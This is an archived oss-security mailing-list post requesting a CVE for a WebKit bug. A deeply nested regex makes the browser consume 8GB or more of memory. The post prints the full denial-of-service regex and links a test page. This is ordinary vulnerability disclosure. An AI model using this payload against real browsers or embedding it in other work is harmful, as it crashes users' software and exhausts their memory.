Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sat, 26 Nov 2016 15:11:44 -0300
From: Gustavo Grieco <gustavo.grieco@...il.com>
To: oss-security@...ts.openwall.com, cve-assign@...re.org
Subject: CVE Request: resource exhaustion in regex expression handling in WebKit

Hello,

Trying to parse and execute this regex code in WebKit:

/($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($(${-2,16}+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)+)/

will consume large amounts of memory (8GB or more), after a few seconds.
This seems to be a case of CWE-400 (uncontrolled resource consumption).

At least, version 2.4.11 Webkit and very recent webkit revisions like
https://github.com/WebKit/webkit/commit/fcf81f3ad83cd910727c7a1824e503
77a474c8f4 are affected.

You can quickly test this issue in different webkit browsers here:

https://dcc.fceia.unr.edu.ar/~ggrieco/oom.html

Fortunately, Chrome and Firefox based browsers are *not* affected.

Please assign a CVE if suitable. It is worth to mention, that a month ago,
i asked to MITRE about another issue related with uncontrolled resource
consumption in Firefox loading a SVG but receive no response.

Regards,
Gustavo.

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ